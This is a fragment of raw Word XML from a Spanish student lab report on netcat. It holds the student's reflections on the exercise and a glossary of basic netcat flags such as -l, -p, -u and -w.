      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB1439">
        <w:t xml:space="preserve"> | grep 2389”</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1AEFC" w14:textId="23C84D77" w:rsidR="00915855" w:rsidRDefault="005863E8">
      <w:r w:rsidRPr="005863E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13BB35AC" wp14:editId="5074F827">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19326994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99455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9FAD" w14:textId="77777777" w:rsidR="00915855" w:rsidRDefault="00915855">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215F066" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9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EB42F14" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3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321B4D05" w14:textId="2BB54A85" w:rsidR="00BE22A0" w:rsidRDefault="000D02C3" w:rsidP="005434F9">
      <w:r>
        <w:t xml:space="preserve">Me ha parecido una práctica bastante larga y un poco mal explicada, ya que faltan partes de los comandos los cuales son necesarios para realizar </w:t>
      </w:r>
      <w:r w:rsidR="00FA4506">
        <w:t>las distintas funciones que requiere la práctica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFDFBF1" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>¿Qué has aprendido?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFF73A8" w14:textId="69133C4D" w:rsidR="00BE22A0" w:rsidRDefault="00F7402A" w:rsidP="005434F9">
      <w:r>
        <w:t>He aprendido bastantes comandos de netcat</w:t>
      </w:r>
      <w:r w:rsidR="003C5C6F">
        <w:t xml:space="preserve"> y a usar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003C5C6F">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003C5C6F">
        <w:t xml:space="preserve"> de Windows y el terminal de Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3FC46" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>¿Lo mejor y lo peor?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B223D" w14:textId="0B600CE2" w:rsidR="00BE22A0" w:rsidRDefault="00F7402A" w:rsidP="005434F9">
      <w:r>
        <w:t xml:space="preserve">Lo mejor ha sido aprender los comandos de netcat y a usar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de Windows y el terminal de Linux. Lo peor ha sido lo difícil que ha sido realizar esta práctica ya que </w:t>
      </w:r>
      <w:r w:rsidR="00264A50">
        <w:t>creo que algunos comandos estaban incompletos</w:t>
      </w:r>
      <w:r w:rsidR="00676997">
        <w:t>. Esto</w:t>
      </w:r>
      <w:r w:rsidR="00087EA5">
        <w:t xml:space="preserve"> ha causado que la práctica se me haga muy </w:t>
      </w:r>
      <w:r w:rsidR="00E67133">
        <w:t>tediosa, larga</w:t>
      </w:r>
      <w:r w:rsidR="00087EA5">
        <w:t xml:space="preserve"> y costosa de realizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0366C8" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>¿Cómo la mejorarías?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580928C" w14:textId="52D856E2" w:rsidR="00BE22A0" w:rsidRDefault="00BE22A0" w:rsidP="005434F9">
      <w:r>
        <w:t xml:space="preserve">Comprobando las explicaciones que acompañan a la práctica y corrigiendo </w:t>
      </w:r>
      <w:r w:rsidR="0000031F">
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r>
        <w:t>errores existentes en ellas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128C0B16" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3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1F931FA0" w14:textId="7529F131" w:rsidR="008107BA" w:rsidRDefault="00531523" w:rsidP="005434F9">
      <w:r>
        <w:t xml:space="preserve">Se podría intentar ejecutar otros tipos de comandos en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de Windows o en la terminal de Linux</w:t>
      </w:r>
      <w:r w:rsidR="008107BA">
        <w:t>, ya sean comandos de instalación, de ejecución de aplicaciones, de borrado del sistema, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786078D3" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3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9CAB24B" w14:textId="77777777" w:rsidR="00334990" w:rsidRPr="00982D72" w:rsidRDefault="00334990" w:rsidP="00334990">
      <w:r>
        <w:t xml:space="preserve">Al tratar de ejecutar los comandos en Windows desde la aplicación, no me dejaba, por lo que he tenido que hacerlo mediante el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768274E" w14:textId="563E6B5B" w:rsidR="0092465A" w:rsidRDefault="00423DB3" w:rsidP="0092465A">
      <w:r>
        <w:t>También,</w:t>
      </w:r>
      <w:r w:rsidR="009E1008">
        <w:t xml:space="preserve"> he tenido bastantes problemas con las explicaciones de las prácticas, dado que estas </w:t>
      </w:r>
      <w:r w:rsidR="001904AC">
        <w:t>estaban mal explicadas</w:t>
      </w:r>
      <w:r w:rsidR="00E67133">
        <w:t>, ante lo que he tenido que pedir ayuda para solventar este problema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E45669" w14:textId="5D28DEAA" w:rsidR="00BE22A0" w:rsidRPr="0092465A" w:rsidRDefault="002B4B52" w:rsidP="0092465A">
      <w:r>
        <w:t xml:space="preserve">Tampoco estaban </w:t>
      </w:r>
      <w:r w:rsidR="009E5288">
        <w:t>bien concretados los objetivos de la práctica, ante lo cual he hecho lo que a mi entender había que hacer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB7B60" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="00662AB7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2E4B2514" w14:textId="77777777" w:rsidR="00692B8C" w:rsidRDefault="00692B8C" w:rsidP="00692B8C">
      <w:r>
        <w:t>Los parámetros utilizados en esta práctica con netcat han sido:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA31AE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l: indica que el puerto queda a la escucha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B0A9A4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p: especifica el número de puerto de la conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868D2B7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k: fuerza a que el servidor permanezca abierto tras haber recibido una conexión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868A406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u: abre el puerto en UDP en vez de en TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1169699A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q: especifica el número de segundos de espera tras recibir un EOF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1404F03F" w14:textId="77777777" w:rsidR="00692B8C" w:rsidRDefault="00692B8C" w:rsidP="00692B8C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-4 y -6: fuerzan a netcat a usar IPv4 o IPv6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C815650" w14:textId="77777777" w:rsidR="00692B8C" w:rsidRPr="00BC69CC" w:rsidRDefault="00692B8C" w:rsidP="00692B8C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>-w: especifica el número de segundos que tarda el cliente en cerrar la conexión desde el último momento que se transmite algo.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00692B8C" w:rsidRPr="00BC69CC" w:rsidSect="005434F9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A07E" w14:textId="77777777" w:rsidR="00A76952" w:rsidRDefault="00A76952" w:rsidP="005434F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E046408" w14:textId="77777777" w:rsidR="00A76952" w:rsidRDefault="00A76952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6026" w14:textId="2147E7F7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982D72" w:rsidRPr="00982D72">
      <w:t>PARP202-Netcat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915855">
      <w:rPr>
        <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
        <w:noProof/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>07/11/2023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AA77" w14:textId="77777777" w:rsidR="00A76952" w:rsidRDefault="00A76952" w:rsidP="005434F9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A52901F" w14:textId="77777777" w:rsidR="00A76952" w:rsidRDefault="00A76952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B5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2AA8BE5E"/>
    <w:lvl w:ilvl="0" w:tplc="58460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6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031F"/>
    <w:rsid w:val="00007499"/>
    <w:rsid w:val="00040DCE"/>
    <w:rsid w:val="00081AD4"/>
    <w:rsid w:val="00087EA5"/>
    <w:rsid w:val="000A5092"/>
    <w:rsid w:val="000B2DB9"/>
    <w:rsid w:val="000B402F"/>
    <w:rsid w:val="000C1A45"/>
    <w:rsid w:val="000C301B"/>
    <w:rsid w:val="000C7FFD"/>
    <w:rsid w:val="000D010D"/>
    <w:rsid w:val="000D02C3"/>
    <w:rsid w:val="000D564A"/>
    <w:rsid w:val="000D7618"/>
    <w:rsid w:val="000E0292"/>
    <w:rsid w:val="000F317E"/>
    <w:rsid w:val="000F697D"/>
    <w:rsid w:val="0010582D"/>
    <w:rsid w:val="00121C4A"/>
    <w:rsid w:val="0013267D"/>
    <w:rsid w:val="00156F56"/>
    <w:rsid w:val="001577A0"/>
    <w:rsid w:val="00165D76"/>
    <w:rsid w:val="001904AC"/>
    <w:rsid w:val="001B5739"/>
    <w:rsid w:val="001C2888"/>
    <w:rsid w:val="001F0224"/>
    <w:rsid w:val="002131AB"/>
    <w:rsid w:val="002132AE"/>
    <w:rsid w:val="0023271F"/>
    <w:rsid w:val="002405F7"/>
    <w:rsid w:val="002446AA"/>
    <w:rsid w:val="00246FDB"/>
    <w:rsid w:val="002477B0"/>
    <w:rsid w:val="002641DD"/>
    <w:rsid w:val="00264A50"/>
    <w:rsid w:val="002702E9"/>
    <w:rsid w:val="00284253"/>
    <w:rsid w:val="002947BC"/>
    <w:rsid w:val="002A4FFA"/>
    <w:rsid w:val="002B4B52"/>
    <w:rsid w:val="002D6D78"/>
    <w:rsid w:val="002F0F8C"/>
    <w:rsid w:val="002F376D"/>
    <w:rsid w:val="002F6FCC"/>
    <w:rsid w:val="00306889"/>
    <w:rsid w:val="0031236B"/>
    <w:rsid w:val="00325D9B"/>
    <w:rsid w:val="00333B01"/>
    <w:rsid w:val="00334990"/>
    <w:rsid w:val="0033636C"/>
    <w:rsid w:val="00346749"/>
    <w:rsid w:val="0036604B"/>
    <w:rsid w:val="00385491"/>
    <w:rsid w:val="00392F86"/>
    <w:rsid w:val="00394A4F"/>
    <w:rsid w:val="003A1EF1"/>
    <w:rsid w:val="003A5C15"/>
    <w:rsid w:val="003B4CCE"/>
    <w:rsid w:val="003C5C6F"/>
    <w:rsid w:val="003E064B"/>
    <w:rsid w:val="003F4036"/>
    <w:rsid w:val="003F4F6E"/>
    <w:rsid w:val="003F7EA2"/>
    <w:rsid w:val="004011D3"/>
    <w:rsid w:val="00423DB3"/>
    <w:rsid w:val="004461E1"/>
    <w:rsid w:val="00447660"/>
    <w:rsid w:val="004754C4"/>
    <w:rsid w:val="004A5C3D"/>
    <w:rsid w:val="004B0B93"/>
    <w:rsid w:val="004C4241"/>
    <w:rsid w:val="005168E5"/>
    <w:rsid w:val="0052018B"/>
    <w:rsid w:val="005307C3"/>
    <w:rsid w:val="00531523"/>
    <w:rsid w:val="00531949"/>
    <w:rsid w:val="00540855"/>
    <w:rsid w:val="005434F9"/>
    <w:rsid w:val="0055328F"/>
    <w:rsid w:val="0055440C"/>
    <w:rsid w:val="005666C5"/>
    <w:rsid w:val="005863E8"/>
    <w:rsid w:val="005A1F95"/>
    <w:rsid w:val="005A621E"/>
    <w:rsid w:val="005C4606"/>
    <w:rsid w:val="005C748D"/>
    <w:rsid w:val="005D590A"/>
    <w:rsid w:val="005E4BEB"/>
    <w:rsid w:val="005E531A"/>
    <w:rsid w:val="005F63F7"/>
    <w:rsid w:val="0060374D"/>
    <w:rsid w:val="00607CB5"/>
    <w:rsid w:val="00613DFC"/>
    <w:rsid w:val="00615CF8"/>
    <w:rsid w:val="0063094A"/>
    <w:rsid w:val="00662AB7"/>
    <w:rsid w:val="00676096"/>
    <w:rsid w:val="00676997"/>
    <w:rsid w:val="00677D72"/>
    <w:rsid w:val="0068380E"/>
    <w:rsid w:val="00692B8C"/>
    <w:rsid w:val="006B53F6"/>
    <w:rsid w:val="006C3C3D"/>
    <w:rsid w:val="006C4A0E"/>
    <w:rsid w:val="006C575A"/>
    <w:rsid w:val="006D28A8"/>
    <w:rsid w:val="0071718F"/>
    <w:rsid w:val="007367AB"/>
    <w:rsid w:val="00744841"/>
    <w:rsid w:val="007467DF"/>
    <w:rsid w:val="00747DDD"/>
    <w:rsid w:val="0075620B"/>
    <w:rsid w:val="00761DCC"/>
    <w:rsid w:val="00766248"/>
    <w:rsid w:val="00790579"/>
    <w:rsid w:val="0079335D"/>
    <w:rsid w:val="00797A78"/>
    <w:rsid w:val="007F035D"/>
    <w:rsid w:val="007F63E4"/>
    <w:rsid w:val="0080090A"/>
    <w:rsid w:val="00803FB6"/>
    <w:rsid w:val="008107BA"/>
    <w:rsid w:val="00844FE5"/>
    <w:rsid w:val="00864EFF"/>
    <w:rsid w:val="00885439"/>
    <w:rsid w:val="0089135F"/>
    <w:rsid w:val="00897ADC"/>
    <w:rsid w:val="008A1CDD"/>
    <w:rsid w:val="008D2D74"/>
    <w:rsid w:val="008D6927"/>
    <w:rsid w:val="0090292D"/>
    <w:rsid w:val="0091061E"/>
    <w:rsid w:val="00915855"/>
    <w:rsid w:val="00917373"/>
    <w:rsid w:val="0092425A"/>
    <w:rsid w:val="0092465A"/>
    <w:rsid w:val="00924822"/>
    <w:rsid w:val="00952616"/>
    <w:rsid w:val="009553E8"/>
    <w:rsid w:val="00964C40"/>
    <w:rsid w:val="00965D53"/>
    <w:rsid w:val="00971D5A"/>
    <w:rsid w:val="00982D72"/>
    <w:rsid w:val="00997FBD"/>
    <w:rsid w:val="009A65D7"/>
    <w:rsid w:val="009D096F"/>
    <w:rsid w:val="009D640C"/>
    <w:rsid w:val="009E1008"/>
    <w:rsid w:val="009E5288"/>
    <w:rsid w:val="00A57362"/>
    <w:rsid w:val="00A66B45"/>
    <w:rsid w:val="00A76952"/>
    <w:rsid w:val="00A81E92"/>
    <w:rsid w:val="00A85FDD"/>
    <w:rsid w:val="00A93C04"/>
    <w:rsid w:val="00AA38FC"/>
    <w:rsid w:val="00AB2624"/>
    <w:rsid w:val="00AB42B2"/>
    <w:rsid w:val="00AD140C"/>
    <w:rsid w:val="00AE7B87"/>
    <w:rsid w:val="00B269B2"/>
    <w:rsid w:val="00B463DF"/>
    <w:rsid w:val="00B54454"/>
    <w:rsid w:val="00B55ED1"/>
    <w:rsid w:val="00B61D46"/>
    <w:rsid w:val="00B66605"/>
    <w:rsid w:val="00B825F9"/>
    <w:rsid w:val="00B83539"/>
    <w:rsid w:val="00B87F53"/>
    <w:rsid w:val="00BA1D21"/>
    <w:rsid w:val="00BA491B"/>
    <w:rsid w:val="00BA5A85"/>
    <w:rsid w:val="00BB0145"/>
    <w:rsid w:val="00BC5D43"/>
    <w:rsid w:val="00BC69CC"/>
    <w:rsid w:val="00BD727D"/>
    <w:rsid w:val="00BE22A0"/>
    <w:rsid w:val="00BF2AAE"/>
    <w:rsid w:val="00BF59D2"/>
    <w:rsid w:val="00C1407A"/>
    <w:rsid w:val="00C20B19"/>
    <w:rsid w:val="00C513DF"/>
    <w:rsid w:val="00C7376D"/>
    <w:rsid w:val="00C76787"/>
    <w:rsid w:val="00C929F5"/>
    <w:rsid w:val="00C97F22"/>
    <w:rsid w:val="00CA0470"/>
    <w:rsid w:val="00CA6323"/>
    <w:rsid w:val="00CB498C"/>
    <w:rsid w:val="00CB4F23"/>
    <w:rsid w:val="00CC18DB"/>
    <w:rsid w:val="00CD525C"/>
    <w:rsid w:val="00CF510C"/>
    <w:rsid w:val="00D10455"/>
    <w:rsid w:val="00D10C69"/>
    <w:rsid w:val="00D113BF"/>
    <w:rsid w:val="00D31B6F"/>
    <w:rsid w:val="00D747CA"/>
    <w:rsid w:val="00D90B44"/>
    <w:rsid w:val="00D91831"/>
    <w:rsid w:val="00DB6A1F"/>
    <w:rsid w:val="00DD617E"/>
    <w:rsid w:val="00E03B5B"/>
    <w:rsid w:val="00E3344E"/>
    <w:rsid w:val="00E33D81"/>
    <w:rsid w:val="00E470FF"/>
    <w:rsid w:val="00E67133"/>
    <w:rsid w:val="00E841D9"/>
    <w:rsid w:val="00E9084A"/>
    <w:rsid w:val="00E97648"/>
    <w:rsid w:val="00EA710B"/>
    <w:rsid w:val="00EB1439"/>
    <w:rsid w:val="00EC1732"/>
    <w:rsid w:val="00EE2467"/>
    <w:rsid w:val="00EE6129"/>
    <w:rsid w:val="00F11D59"/>
    <w:rsid w:val="00F11E05"/>
    <w:rsid w:val="00F1205A"/>
    <w:rsid w:val="00F61D21"/>
    <w:rsid w:val="00F65A05"/>
    <w:rsid w:val="00F70681"/>
    <w:rsid w:val="00F706EA"/>
    <w:rsid w:val="00F7402A"/>
    <w:rsid w:val="00F772C2"/>
    <w:rsid w:val="00F8131C"/>
    <w:rsid w:val="00F8222C"/>
    <w:rsid w:val="00F87DC0"/>
    <w:rsid w:val="00F960A8"/>
    <w:rsid w:val="00FA4506"/>
    <w:rsid w:val="00FE349F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6C57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74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ncraton.org/blog/46/netcat-for-windo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227</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-22T11:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-07T21:59:00Z</dcterms:modified>
  <cp:category>Prácticas PAR; FP; ASIR1; 504; JCantínS; PAR; Estudios; Tajamar</cp:category>
  <dc:language>Español</dc:language>
</cp:coreProperties>
</file>